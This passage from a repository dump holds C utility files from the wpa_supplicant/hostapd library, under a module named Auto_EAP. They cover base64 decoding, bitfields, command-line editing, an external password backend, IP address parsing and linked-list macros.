os_malloc(olen); 120 | if (out == NULL) 121 | return NULL; 122 | 123 | count = 0; 124 | for (i = 0; i < len; i++) { 125 | tmp = dtable[src[i]]; 126 | if (tmp == 0x80) 127 | continue; 128 | 129 | if (src[i] == '=') 130 | pad++; 131 | block[count] = tmp; 132 | count++; 133 | if (count == 4) { 134 | *pos++ = (block[0] << 2) | (block[1] >> 4); 135 | *pos++ = (block[1] << 4) | (block[2] >> 2); 136 | *pos++ = (block[2] << 6) | block[3]; 137 | count = 0; 138 | if (pad) { 139 | if (pad == 1) 140 | pos--; 141 | else if (pad == 2) 142 | pos -= 2; 143 | else { 144 | /* Invalid padding */ 145 | os_free(out); 146 | return NULL; 147 | } 148 | break; 149 | } 150 | } 151 | } 152 | 153 | *out_len = pos - out; 154 | return out; 155 | } 156 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Base64 encoding/decoding (RFC1341) 3 | * Copyright (c) 2005, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef BASE64_H 10 | #define BASE64_H 11 | 12 | unsigned char * base64_encode(const unsigned char *src, size_t len, 13 | size_t *out_len); 14 | unsigned char * base64_decode(const unsigned char *src, size_t len, 15 | size_t *out_len); 16 | 17 | #endif /* BASE64_H */ 18 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/bitfield.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Bitfield 3 | * Copyright (c) 2013, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #include "common.h" 12 | #include "bitfield.h" 13 | 14 | 15 | struct bitfield { 16 | u8 *bits; 17 | size_t max_bits; 18 | }; 19 | 20 | 21 | struct bitfield * bitfield_alloc(size_t max_bits) 22 | { 23 | struct bitfield *bf; 24 | 25 | bf = os_zalloc(sizeof(*bf) + (max_bits + 7) / 8); 26 | if (bf == NULL) 27 | return NULL; 28 | bf->bits = (u8 *) (bf + 1); 29 | bf->max_bits = max_bits; 30 | return bf; 31 | } 32 | 33 | 34 | void bitfield_free(struct bitfield *bf) 35 | { 36 | os_free(bf); 37 | } 38 | 39 | 40 | void bitfield_set(struct bitfield *bf, size_t bit) 41 | { 42 | if (bit >= bf->max_bits) 43 | return; 44 | bf->bits[bit / 8] |= BIT(bit % 8); 45 | } 46 | 47 | 48 | void bitfield_clear(struct bitfield *bf, size_t bit) 49 | { 50 | if (bit >= bf->max_bits) 51 | return; 52 | bf->bits[bit / 8] &= ~BIT(bit % 8); 53 | } 54 | 55 | 56 | int bitfield_is_set(struct bitfield *bf, size_t bit) 57 | { 58 | if (bit >= bf->max_bits) 59 | return 0; 60 | return !!(bf->bits[bit / 8] & BIT(bit % 8)); 61 | } 62 | 63 | 64 | static int first_zero(u8 val) 65 | { 66 | int i; 67 | for (i = 0; i < 8; i++) { 68 | if (!(val & 0x01)) 69 | return i; 70 | val >>= 1; 71 | } 72 | return -1; 73 | } 74 | 75 | 76 | int bitfield_get_first_zero(struct bitfield *bf) 77 | { 78 | size_t i; 79 | for (i = 0; i <= (bf->max_bits + 7) / 8; i++) { 80 | if (bf->bits[i] != 0xff) 81 | break; 82 | } 83 | if (i > (bf->max_bits + 7) / 8) 84 | return -1; 85 | i = i * 8 + first_zero(bf->bits[i]); 86 | if (i >= bf->max_bits) 87 | return -1; 88 | return i; 89 | } 90 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/bitfield.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Bitfield 3 | * Copyright (c) 2013, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef BITFIELD_H 10 | #define BITFIELD_H 11 | 12 | struct bitfield; 13 | 14 | struct bitfield * bitfield_alloc(size_t max_bits); 15 | void bitfield_free(struct bitfield *bf); 16 | void bitfield_set(struct bitfield *bf, size_t bit); 17 | void bitfield_clear(struct bitfield *bf, size_t bit); 18 | int bitfield_is_set(struct bitfield *bf, size_t bit); 19 | int bitfield_get_first_zero(struct bitfield *bf); 20 | 21 | #endif /* BITFIELD_H */ 22 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/build_config.h: -------------------------------------------------------------------------------- 1 | /* 2 | * wpa_supplicant/hostapd - Build time configuration defines 3 | * Copyright (c) 2005-2006, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | * 8 | * This header file can be used to define configuration defines that were 9 | * originally defined in Makefile. This is mainly meant for IDE use or for 10 | * systems that do not have suitable 'make' tool. In these cases, it may be 11 | * easier to have a single place for defining all the needed C pre-processor 12 | * defines. 13 | */ 14 | 15 | #ifndef BUILD_CONFIG_H 16 | #define BUILD_CONFIG_H 17 | 18 | /* Insert configuration defines, e.g., #define EAP_MD5, here, if needed. */ 19 | 20 | #ifdef CONFIG_WIN32_DEFAULTS 21 | #define CONFIG_NATIVE_WINDOWS 22 | #define CONFIG_ANSI_C_EXTRA 23 | #define CONFIG_WINPCAP 24 | #define IEEE8021X_EAPOL 25 | #define PKCS12_FUNCS 26 | #define PCSC_FUNCS 27 | #define CONFIG_CTRL_IFACE 28 | #define CONFIG_CTRL_IFACE_NAMED_PIPE 29 | #define CONFIG_DRIVER_NDIS 30 | #define CONFIG_NDIS_EVENTS_INTEGRATED 31 | #define CONFIG_DEBUG_FILE 32 | #define EAP_MD5 33 | #define EAP_TLS 34 | #define EAP_MSCHAPv2 35 | #define EAP_PEAP 36 | #define EAP_TTLS 37 | #define EAP_GTC 38 | #define EAP_OTP 39 | #define EAP_LEAP 40 | #define EAP_TNC 41 | #define _CRT_SECURE_NO_DEPRECATE 42 | 43 | #ifdef USE_INTERNAL_CRYPTO 44 | #define CONFIG_TLS_INTERNAL_CLIENT 45 | #define CONFIG_INTERNAL_LIBTOMMATH 46 | #define CONFIG_CRYPTO_INTERNAL 47 | #endif /* USE_INTERNAL_CRYPTO */ 48 | #endif /* CONFIG_WIN32_DEFAULTS */ 49 | 50 | #ifdef CONFIG_XCODE_DEFAULTS 51 | #define CONFIG_DRIVER_OSX 52 | #define CONFIG_BACKEND_FILE 53 | #define IEEE8021X_EAPOL 54 | #define PKCS12_FUNCS 55 | #define CONFIG_CTRL_IFACE 56 | #define CONFIG_CTRL_IFACE_UNIX 57 | #define CONFIG_DEBUG_FILE 58 | #define EAP_MD5 59 | #define EAP_TLS 60 | #define EAP_MSCHAPv2 61 | #define EAP_PEAP 62 | #define EAP_TTLS 63 | #define EAP_GTC 64 | #define EAP_OTP 65 | #define EAP_LEAP 66 | #define EAP_TNC 67 | #define CONFIG_WPS 68 | #define EAP_WSC 69 | 70 | #ifdef USE_INTERNAL_CRYPTO 71 | #define CONFIG_TLS_INTERNAL_CLIENT 72 | #define CONFIG_INTERNAL_LIBTOMMATH 73 | #define CONFIG_CRYPTO_INTERNAL 74 | #endif /* USE_INTERNAL_CRYPTO */ 75 | #endif /* CONFIG_XCODE_DEFAULTS */ 76 | 77 | #endif /* BUILD_CONFIG_H */ 78 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/edit.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Command line editing and history 3 | * Copyright (c) 2010, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef EDIT_H 10 | #define EDIT_H 11 | 12 | int edit_init(void (*cmd_cb)(void *ctx, char *cmd), 13 | void (*eof_cb)(void *ctx), 14 | char ** (*completion_cb)(void *ctx, const char *cmd, int pos), 15 | void *ctx, const char *history_file, const char *ps); 16 | void edit_deinit(const char *history_file, 17 | int (*filter_cb)(void *ctx, const char *cmd)); 18 | void edit_clear_line(void); 19 | void edit_redraw(void); 20 | 21 | #endif /* EDIT_H */ 22 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/edit_readline.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Command line editing and history wrapper for readline 3 | * Copyright (c) 2010, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | #include 11 | #include 12 | 13 | #include "common.h" 14 | #include "eloop.h" 15 | #include "edit.h" 16 | 17 | 18 | static void *edit_cb_ctx; 19 | static void (*edit_cmd_cb)(void *ctx, char *cmd); 20 | static void (*edit_eof_cb)(void *ctx); 21 | static char ** (*edit_completion_cb)(void *ctx, const char *cmd, int pos) = 22 | NULL; 23 | 24 | static char **pending_completions = NULL; 25 | 26 | 27 | static void readline_free_completions(void) 28 | { 29 | int i; 30 | if (pending_completions == NULL) 31 | return; 32 | for (i = 0; pending_completions[i]; i++) 33 | os_free(pending_completions[i]); 34 | os_free(pending_completions); 35 | pending_completions = NULL; 36 | } 37 | 38 | 39 | static char * readline_completion_func(const char *text, int state) 40 | { 41 | static int pos = 0; 42 | static size_t len = 0; 43 | 44 | if (pending_completions == NULL) { 45 | rl_attempted_completion_over = 1; 46 | return NULL; 47 | } 48 | 49 | if (state == 0) { 50 | pos = 0; 51 | len = os_strlen(text); 52 | } 53 | for (; pending_completions[pos]; pos++) { 54 | if (strncmp(pending_completions[pos], text, len) == 0) 55 | return strdup(pending_completions[pos++]); 56 | } 57 | 58 | rl_attempted_completion_over = 1; 59 | return NULL; 60 | } 61 | 62 | 63 | static char ** readline_completion(const char *text, int start, int end) 64 | { 65 | readline_free_completions(); 66 | if (edit_completion_cb) 67 | pending_completions = edit_completion_cb(edit_cb_ctx, 68 | rl_line_buffer, end); 69 | return rl_completion_matches(text, readline_completion_func); 70 | } 71 | 72 | 73 | static void edit_read_char(int sock, void *eloop_ctx, void *sock_ctx) 74 | { 75 | rl_callback_read_char(); 76 | } 77 | 78 | 79 | static void trunc_nl(char *str) 80 | { 81 | char *pos = str; 82 | while (*pos != '\0') { 83 | if (*pos == '\n') { 84 | *pos = '\0'; 85 | break; 86 | } 87 | pos++; 88 | } 89 | } 90 | 91 | 92 | static void readline_cmd_handler(char *cmd) 93 | { 94 | if (cmd && *cmd) { 95 | HIST_ENTRY *h; 96 | while (next_history()) 97 | ; 98 | h = previous_history(); 99 | if (h == NULL || os_strcmp(cmd, h->line) != 0) 100 | add_history(cmd); 101 | next_history(); 102 | } 103 | if (cmd == NULL) { 104 | edit_eof_cb(edit_cb_ctx); 105 | return; 106 | } 107 | trunc_nl(cmd); 108 | edit_cmd_cb(edit_cb_ctx, cmd); 109 | } 110 | 111 | 112 | int edit_init(void (*cmd_cb)(void *ctx, char *cmd), 113 | void (*eof_cb)(void *ctx), 114 | char ** (*completion_cb)(void *ctx, const char *cmd, int pos), 115 | void *ctx, const char *history_file, const char *ps) 116 | { 117 | edit_cb_ctx = ctx; 118 | edit_cmd_cb = cmd_cb; 119 | edit_eof_cb = eof_cb; 120 | edit_completion_cb = completion_cb; 121 | 122 | rl_attempted_completion_function = readline_completion; 123 | if (history_file) { 124 | read_history(history_file); 125 | stifle_history(100); 126 | } 127 | 128 | eloop_register_read_sock(STDIN_FILENO, edit_read_char, NULL, NULL); 129 | 130 | if (ps) { 131 | size_t blen = os_strlen(ps) + 3; 132 | char *ps2 = os_malloc(blen); 133 | if (ps2) { 134 | os_snprintf(ps2, blen, "%s> ", ps); 135 | rl_callback_handler_install(ps2, readline_cmd_handler); 136 | os_free(ps2); 137 | return 0; 138 | } 139 | } 140 | 141 | rl_callback_handler_install("> ", readline_cmd_handler); 142 | 143 | return 0; 144 | } 145 | 146 | 147 | void edit_deinit(const char *history_file, 148 | int (*filter_cb)(void *ctx, const char *cmd)) 149 | { 150 | rl_set_prompt(""); 151 | rl_replace_line("", 0); 152 | rl_redisplay(); 153 | rl_callback_handler_remove(); 154 | readline_free_completions(); 155 | 156 | eloop_unregister_read_sock(STDIN_FILENO); 157 | 158 | if (history_file) { 159 | /* Save command history, excluding lines that may contain 160 | * passwords. */ 161 | HIST_ENTRY *h; 162 | history_set_pos(0); 163 | while ((h = current_history())) { 164 | char *p = h->line; 165 | while (*p == ' ' || *p == '\t') 166 | p++; 167 | if (filter_cb && filter_cb(edit_cb_ctx, p)) { 168 | h = remove_history(where_history()); 169 | if (h) { 170 | os_free(h->line); 171 | free(h->data); 172 | os_free(h); 173 | } else 174 | next_history(); 175 | } else 176 | next_history(); 177 | } 178 | write_history(history_file); 179 | } 180 | } 181 | 182 | 183 | void edit_clear_line(void) 184 | { 185 | } 186 | 187 | 188 | void edit_redraw(void) 189 | { 190 | rl_on_new_line(); 191 | rl_redisplay(); 192 | } 193 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/edit_simple.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Minimal command line editing 3 | * Copyright (c) 2010, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #include "common.h" 12 | #include "eloop.h" 13 | #include "edit.h" 14 | 15 | 16 | #define CMD_BUF_LEN 256 17 | static char cmdbuf[CMD_BUF_LEN]; 18 | static int cmdbuf_pos = 0; 19 | static const char *ps2 = NULL; 20 | 21 | static void *edit_cb_ctx; 22 | static void (*edit_cmd_cb)(void *ctx, char *cmd); 23 | static void (*edit_eof_cb)(void *ctx); 24 | 25 | 26 | static void edit_read_char(int sock, void *eloop_ctx, void *sock_ctx) 27 | { 28 | int c; 29 | unsigned char buf[1]; 30 | int res; 31 | 32 | res = read(sock, buf, 1); 33 | if (res < 0) 34 | perror("read"); 35 | if (res <= 0) { 36 | edit_eof_cb(edit_cb_ctx); 37 | return; 38 | } 39 | c = buf[0]; 40 | 41 | if (c == '\r' || c == '\n') { 42 | cmdbuf[cmdbuf_pos] = '\0'; 43 | cmdbuf_pos = 0; 44 | edit_cmd_cb(edit_cb_ctx, cmdbuf); 45 | printf("%s> ", ps2 ? ps2 : ""); 46 | fflush(stdout); 47 | return; 48 | } 49 | 50 | if (c >= 32 && c <= 255) { 51 | if (cmdbuf_pos < (int) sizeof(cmdbuf) - 1) { 52 | cmdbuf[cmdbuf_pos++] = c; 53 | } 54 | } 55 | } 56 | 57 | 58 | int edit_init(void (*cmd_cb)(void *ctx, char *cmd), 59 | void (*eof_cb)(void *ctx), 60 | char ** (*completion_cb)(void *ctx, const char *cmd, int pos), 61 | void *ctx, const char *history_file, const char *ps) 62 | { 63 | edit_cb_ctx = ctx; 64 | edit_cmd_cb = cmd_cb; 65 | edit_eof_cb = eof_cb; 66 | eloop_register_read_sock(STDIN_FILENO, edit_read_char, NULL, NULL); 67 | ps2 = ps; 68 | 69 | printf("%s> ", ps2 ? ps2 : ""); 70 | fflush(stdout); 71 | 72 | return 0; 73 | } 74 | 75 | 76 | void edit_deinit(const char *history_file, 77 | int (*filter_cb)(void *ctx, const char *cmd)) 78 | { 79 | eloop_unregister_read_sock(STDIN_FILENO); 80 | } 81 | 82 | 83 | void edit_clear_line(void) 84 | { 85 | } 86 | 87 | 88 | void edit_redraw(void) 89 | { 90 | cmdbuf[cmdbuf_pos] = '\0'; 91 | printf("\r> %s", cmdbuf); 92 | } 93 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/ext_password.c: -------------------------------------------------------------------------------- 1 | /* 2 | * External password backend 3 | * Copyright (c) 2012, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #ifdef __linux__ 12 | #include 13 | #endif /* __linux__ */ 14 | 15 | #include "common.h" 16 | #include "ext_password_i.h" 17 | 18 | 19 | #ifdef CONFIG_EXT_PASSWORD_TEST 20 | extern struct ext_password_backend ext_password_test; 21 | #endif /* CONFIG_EXT_PASSWORD_TEST */ 22 | 23 | static const struct ext_password_backend *backends[] = { 24 | #ifdef CONFIG_EXT_PASSWORD_TEST 25 | &ext_password_test, 26 | #endif /* CONFIG_EXT_PASSWORD_TEST */ 27 | NULL 28 | }; 29 | 30 | struct ext_password_data { 31 | const struct ext_password_backend *backend; 32 | void *priv; 33 | }; 34 | 35 | 36 | struct ext_password_data * ext_password_init(const char *backend, 37 | const char *params) 38 | { 39 | struct ext_password_data *data; 40 | int i; 41 | 42 | data = os_zalloc(sizeof(*data)); 43 | if (data == NULL) 44 | return NULL; 45 | 46 | for (i = 0; backends[i]; i++) { 47 | if (os_strcmp(backends[i]->name, backend) == 0) { 48 | data->backend = backends[i]; 49 | break; 50 | } 51 | } 52 | 53 | if (!data->backend) { 54 | os_free(data); 55 | return NULL; 56 | } 57 | 58 | data->priv = data->backend->init(params); 59 | if (data->priv == NULL) { 60 | os_free(data); 61 | return NULL; 62 | } 63 | 64 | return data; 65 | } 66 | 67 | 68 | void ext_password_deinit(struct ext_password_data *data) 69 | { 70 | if (data && data->backend && data->priv) 71 | data->backend->deinit(data->priv); 72 | os_free(data); 73 | } 74 | 75 | 76 | struct wpabuf * ext_password_get(struct ext_password_data *data, 77 | const char *name) 78 | { 79 | if (data == NULL) 80 | return NULL; 81 | return data->backend->get(data->priv, name); 82 | } 83 | 84 | 85 | struct wpabuf * ext_password_alloc(size_t len) 86 | { 87 | struct wpabuf *buf; 88 | 89 | buf = wpabuf_alloc(len); 90 | if (buf == NULL) 91 | return NULL; 92 | 93 | #ifdef __linux__ 94 | if (mlock(wpabuf_head(buf), wpabuf_len(buf)) < 0) { 95 | wpa_printf(MSG_ERROR, "EXT PW: mlock failed: %s", 96 | strerror(errno)); 97 | } 98 | #endif /* __linux__ */ 99 | 100 | return buf; 101 | } 102 | 103 | 104 | void ext_password_free(struct wpabuf *pw) 105 | { 106 | if (pw == NULL) 107 | return; 108 | os_memset(wpabuf_mhead(pw), 0, wpabuf_len(pw)); 109 | #ifdef __linux__ 110 | if (munlock(wpabuf_head(pw), wpabuf_len(pw)) < 0) { 111 | wpa_printf(MSG_ERROR, "EXT PW: munlock failed: %s", 112 | strerror(errno)); 113 | } 114 | #endif /* __linux__ */ 115 | wpabuf_free(pw); 116 | } 117 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/ext_password.h: -------------------------------------------------------------------------------- 1 | /* 2 | * External password backend 3 | * Copyright (c) 2012, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef EXT_PASSWORD_H 10 | #define EXT_PASSWORD_H 11 | 12 | struct ext_password_data; 13 | 14 | #ifdef CONFIG_EXT_PASSWORD 15 | 16 | struct ext_password_data * ext_password_init(const char *backend, 17 | const char *params); 18 | void ext_password_deinit(struct ext_password_data *data); 19 | 20 | struct wpabuf * ext_password_get(struct ext_password_data *data, 21 | const char *name); 22 | void ext_password_free(struct wpabuf *pw); 23 | 24 | #else /* CONFIG_EXT_PASSWORD */ 25 | 26 | #define ext_password_init(b, p) ((void *) 1) 27 | #define ext_password_deinit(d) do { } while (0) 28 | #define ext_password_get(d, n) (NULL) 29 | #define ext_password_free(p) do { } while (0) 30 | 31 | #endif /* CONFIG_EXT_PASSWORD */ 32 | 33 | #endif /* EXT_PASSWORD_H */ 34 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/ext_password_i.h: -------------------------------------------------------------------------------- 1 | /* 2 | * External password backend - internal definitions 3 | * Copyright (c) 2012, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef EXT_PASSWORD_I_H 10 | #define EXT_PASSWORD_I_H 11 | 12 | #include "ext_password.h" 13 | 14 | struct ext_password_backend { 15 | const char *name; 16 | void * (*init)(const char *params); 17 | void (*deinit)(void *ctx); 18 | struct wpabuf * (*get)(void *ctx, const char *name); 19 | }; 20 | 21 | struct wpabuf * ext_password_alloc(size_t len); 22 | 23 | #endif /* EXT_PASSWORD_I_H */ 24 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/ext_password_test.c: -------------------------------------------------------------------------------- 1 | /* 2 | * External password backend 3 | * Copyright (c) 2012, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #include "common.h" 12 | #include "ext_password_i.h" 13 | 14 | 15 | struct ext_password_test_data { 16 | char *params; 17 | }; 18 | 19 | 20 | static void * ext_password_test_init(const char *params) 21 | { 22 | struct ext_password_test_data *data; 23 | 24 | data = os_zalloc(sizeof(*data)); 25 | if (data == NULL) 26 | return NULL; 27 | 28 | if (params) 29 | data->params = os_strdup(params); 30 | 31 | return data; 32 | } 33 | 34 | 35 | static void ext_password_test_deinit(void *ctx) 36 | { 37 | struct ext_password_test_data *data = ctx; 38 | 39 | os_free(data->params); 40 | os_free(data); 41 | } 42 | 43 | 44 | static struct wpabuf * ext_password_test_get(void *ctx, const char *name) 45 | { 46 | struct ext_password_test_data *data = ctx; 47 | char *pos, *pos2; 48 | size_t nlen; 49 | 50 | wpa_printf(MSG_DEBUG, "EXT PW TEST: get(%s)", name); 51 | 52 | pos = data->params; 53 | if (pos == NULL) 54 | return NULL; 55 | nlen = os_strlen(name); 56 | 57 | while (pos && *pos) { 58 | if (os_strncmp(pos, name, nlen) == 0 && pos[nlen] == '=') { 59 | struct wpabuf *buf; 60 | pos += nlen + 1; 61 | pos2 = pos; 62 | while (*pos2 != '|' && *pos2 != '\0') 63 | pos2++; 64 | buf = ext_password_alloc(pos2 - pos); 65 | if (buf == NULL) 66 | return NULL; 67 | wpabuf_put_data(buf, pos, pos2 - pos); 68 | wpa_hexdump_ascii_key(MSG_DEBUG, "EXT PW TEST: value", 69 | wpabuf_head(buf), 70 | wpabuf_len(buf)); 71 | return buf; 72 | } 73 | 74 | pos = os_strchr(pos + 1, '|'); 75 | if (pos) 76 | pos++; 77 | } 78 | 79 | wpa_printf(MSG_DEBUG, "EXT PW TEST: get(%s) - not found", name); 80 | 81 | return NULL; 82 | } 83 | 84 | 85 | const struct ext_password_backend ext_password_test = { 86 | .name = "test", 87 | .init = ext_password_test_init, 88 | .deinit = ext_password_test_deinit, 89 | .get = ext_password_test_get, 90 | }; 91 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/includes.h: -------------------------------------------------------------------------------- 1 | /* 2 | * wpa_supplicant/hostapd - Default include files 3 | * Copyright (c) 2005-2006, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | * 8 | * This header file is included into all C files so that commonly used header 9 | * files can be selected with OS specific ifdef blocks in one place instead of 10 | * having to have OS/C library specific selection in many files. 11 | */ 12 | 13 | #ifndef INCLUDES_H 14 | #define INCLUDES_H 15 | 16 | /* Include possible build time configuration before including anything else */ 17 | #include "build_config.h" 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #ifndef _WIN32_WCE 24 | #ifndef CONFIG_TI_COMPILER 25 | #include 26 | #include 27 | #endif /* CONFIG_TI_COMPILER */ 28 | #include 29 | #endif /* _WIN32_WCE */ 30 | #include 31 | 32 | #ifndef CONFIG_TI_COMPILER 33 | #ifndef _MSC_VER 34 | #include 35 | #endif /* _MSC_VER */ 36 | #endif /* CONFIG_TI_COMPILER */ 37 | 38 | #ifndef CONFIG_NATIVE_WINDOWS 39 | #ifndef CONFIG_TI_COMPILER 40 | #include 41 | #include 42 | #include 43 | #ifndef __vxworks 44 | #include 45 | #include 46 | #endif /* __vxworks */ 47 | #endif /* CONFIG_TI_COMPILER */ 48 | #endif /* CONFIG_NATIVE_WINDOWS */ 49 | 50 | #endif /* INCLUDES_H */ 51 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/ip_addr.c: -------------------------------------------------------------------------------- 1 | /* 2 | * IP address processing 3 | * Copyright (c) 2003-2006, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #include "common.h" 12 | #include "ip_addr.h" 13 | 14 | const char * hostapd_ip_txt(const struct hostapd_ip_addr *addr, char *buf, 15 | size_t buflen) 16 | { 17 | if (buflen == 0 || addr == NULL) 18 | return NULL; 19 | 20 | if (addr->af == AF_INET) { 21 | os_strlcpy(buf, inet_ntoa(addr->u.v4), buflen); 22 | } else { 23 | buf[0] = '\0'; 24 | } 25 | #ifdef CONFIG_IPV6 26 | if (addr->af == AF_INET6) { 27 | if (inet_ntop(AF_INET6, &addr->u.v6, buf, buflen) == NULL) 28 | buf[0] = '\0'; 29 | } 30 | #endif /* CONFIG_IPV6 */ 31 | 32 | return buf; 33 | } 34 | 35 | 36 | int hostapd_ip_diff(struct hostapd_ip_addr *a, struct hostapd_ip_addr *b) 37 | { 38 | if (a == NULL && b == NULL) 39 | return 0; 40 | if (a == NULL || b == NULL) 41 | return 1; 42 | 43 | switch (a->af) { 44 | case AF_INET: 45 | if (a->u.v4.s_addr != b->u.v4.s_addr) 46 | return 1; 47 | break; 48 | #ifdef CONFIG_IPV6 49 | case AF_INET6: 50 | if (os_memcmp(&a->u.v6, &b->u.v6, sizeof(a->u.v6)) != 0) 51 | return 1; 52 | break; 53 | #endif /* CONFIG_IPV6 */ 54 | } 55 | 56 | return 0; 57 | } 58 | 59 | 60 | int hostapd_parse_ip_addr(const char *txt, struct hostapd_ip_addr *addr) 61 | { 62 | #ifndef CONFIG_NATIVE_WINDOWS 63 | if (inet_aton(txt, &addr->u.v4)) { 64 | addr->af = AF_INET; 65 | return 0; 66 | } 67 | 68 | #ifdef CONFIG_IPV6 69 | if (inet_pton(AF_INET6, txt, &addr->u.v6) > 0) { 70 | addr->af = AF_INET6; 71 | return 0; 72 | } 73 | #endif /* CONFIG_IPV6 */ 74 | #endif /* CONFIG_NATIVE_WINDOWS */ 75 | 76 | return -1; 77 | } 78 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/ip_addr.h: -------------------------------------------------------------------------------- 1 | /* 2 | * IP address processing 3 | * Copyright (c) 2003-2006, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef IP_ADDR_H 10 | #define IP_ADDR_H 11 | 12 | struct hostapd_ip_addr { 13 | int af; /* AF_INET / AF_INET6 */ 14 | union { 15 | struct in_addr v4; 16 | #ifdef CONFIG_IPV6 17 | struct in6_addr v6; 18 | #endif /* CONFIG_IPV6 */ 19 | u8 max_len[16]; 20 | } u; 21 | }; 22 | 23 | const char * hostapd_ip_txt(const struct hostapd_ip_addr *addr, char *buf, 24 | size_t buflen); 25 | int hostapd_ip_diff(struct hostapd_ip_addr *a, struct hostapd_ip_addr *b); 26 | int hostapd_parse_ip_addr(const char *txt, struct hostapd_ip_addr *addr); 27 | 28 | #endif /* IP_ADDR_H */ 29 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/list.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Doubly-linked list 3 | * Copyright (c) 2009, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef LIST_H 10 | #define LIST_H 11 | 12 | /** 13 | * struct dl_list - Doubly-linked list 14 | */ 15 | struct dl_list { 16 | struct dl_list *next; 17 | struct dl_list *prev; 18 | }; 19 | 20 | static inline void dl_list_init(struct dl_list *list) 21 | { 22 | list->next = list; 23 | list->prev = list; 24 | } 25 | 26 | static inline void dl_list_add(struct dl_list *list, struct dl_list *item) 27 | { 28 | item->next = list->next; 29 | item->prev = list; 30 | list->next->prev = item; 31 | list->next = item; 32 | } 33 | 34 | static inline void dl_list_add_tail(struct dl_list *list, struct dl_list *item) 35 | { 36 | dl_list_add(list->prev, item); 37 | } 38 | 39 | static inline void dl_list_del(struct dl_list *item) 40 | { 41 | item->next->prev = item->prev; 42 | item->prev->next = item->next; 43 | item->next = NULL; 44 | item->prev = NULL; 45 | } 46 | 47 | static inline int dl_list_empty(struct dl_list *list) 48 | { 49 | return list->next == list; 50 | } 51 | 52 | static inline unsigned int dl_list_len(struct dl_list *list) 53 | { 54 | struct dl_list *item; 55 | int count = 0; 56 | for (item = list->next; item != list; item = item->next) 57 | count++; 58 | return count; 59 | } 60 | 61 | #ifndef offsetof 62 | #define offsetof(type, member) ((long) &((type *) 0)->member) 63 | #endif 64 | 65 | #define dl_list_entry(item, type, member) \ 66 | ((type *) ((char *) item - offsetof(type, member))) 67 | 68 | #define dl_list_first(list, type, member) \ 69 | (dl_list_empty((list)) ? NULL : \ 70 | dl_list_entry((list)->next, type, member)) 71 | 72 | #define dl_list_last(list, type, member) \ 73 | (dl_list_empty((list)) ? NULL : \ 74 | dl_list_entry((list)->prev, type, member)) 75 | 76 | #define dl_list_for_each(item, list, type, member) \ 77 | for (item = dl_list_entry((list)->next, type, member); \ 78 | &item->member != (list); \ 79 | item = dl_list_entry(item->member.next, type, member)) 80 | 81 | #define dl_list_for_each_safe(item, n, list, type, member) \ 82 | for (item = dl_list_entry((list)->next, type, member), \ 83 | n = dl_list_entry(item->member.next, type, member); \ 84 | &item->member != (list); \ 85 | item = n, n = dl_list_entry(n->member.next, type, member)) 86 | 87 | #define dl_list_for_each_reverse(item, list, type, member) \ 88 | for (item = dl_list_entry((list)->prev, type, member); \ 89 | &item->member != (list); \ 90 | item = dl_list_entry(item->member.prev, type, member)) 91 | 92 | #define DEFINE_DL_LIST(name) \ 93 | struct dl_list name = { &(name), &(name) } 94 | 95 | #endif /* LIST_H */ 96 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/os_none.c: -------------------------------------------------------------------------------- 1 | /* 2 | * wpa_supplicant/hostapd / Empty OS specific functions 3 | 